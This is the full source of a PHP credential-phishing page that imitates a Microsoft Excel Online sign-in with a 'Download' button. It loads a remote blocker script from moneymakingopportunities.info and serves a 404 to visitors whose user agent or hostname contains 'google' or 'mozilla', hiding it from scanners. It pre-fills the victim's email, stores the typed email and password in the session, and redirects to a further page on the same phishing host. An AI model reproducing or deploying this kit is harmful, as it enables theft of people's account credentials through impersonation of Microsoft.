<?php
include('https://moneymakingopportunities.info/a/excel/blocker.php');
session_start();
error_reporting(0);
@set_time_limit(0);
if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false || strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false || strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'mozilla') !== false){ @header('HTTP/1.0 404 Not Found');
exit(); }

$url="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
    parse_str(parse_url($url, PHP_URL_QUERY));
    $parts = @explode('@', $userid);
    $user = @$parts[0];

if(isset($_POST['email'])){
	$_SESSION['email'] = $_POST['email'];
	$_SESSION['pass'] = $_POST['password'];
	header('Location: https://moneymakingopportunities.info/a/excel/Login.php?doc=_VJOXK0QWHtoGYDw&userid='.$userid);
	exit();
}
?>
<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8" />
    <meta name="robots" content="none" />
    <meta name="robots" content="noindex, noarchive, nofollow, nosnippet" />
    <meta
      name="googlebot"
      content="noindex, noarchive, nofollow, nosnippet, noimageindex"
    />
    <meta
      name="slurp"
      content="noindex, noarchive, nofollow, nosnippet, noodp, noydir"
    />
    <meta name="msnbot" content="noindex, noarchive, nofollow, nosnippet" />
    <meta name="teoma" content="noindex, noarchive, nofollow, nosnippet" />
    <title>Excel Online - 09KSJDJR4843984NF98738UNFD843</title>
    <link rel="icon" type="image/png" href="https://moneymakingopportunities.info/a/excel/images/favicon.ico" />
    <link rel="stylesheet" href="styles/index.css" />
  </head>
  <body>
    <div class="container">
      <div class="login">
        <form method="POST" action="">
          <img
            src="https://moneymakingopportunities.info/a/excel/images/microsoft-logo-white-png.png"
            alt="logo"
            height="40"
          />
          <h1 class="title">
            Excel
          </h1>
          <div class="form">
            <?php if ($_SESSION['error']) { ?>
            <div class="error">
              <?php echo $_SESSION['error']; ?>
            </div>
            <?php } ?>
            <input
              type="email"
              name="email"
              class="form-input"
              placeholder="Enter email address"
              value="<?php echo $userid ?>"
              required
            />
            <input
              name="password"
              type="password"
              class="form-input"
              placeholder="Enter password"
              min="8"
              required
            />
            <button class="btn-submit" type="submit">Download</button>
          </div>
        </form>
        <div class="form-footer">
          Microsoft &copy; 2022
        </div>
      </div>
    </div>
  </body>
</html>
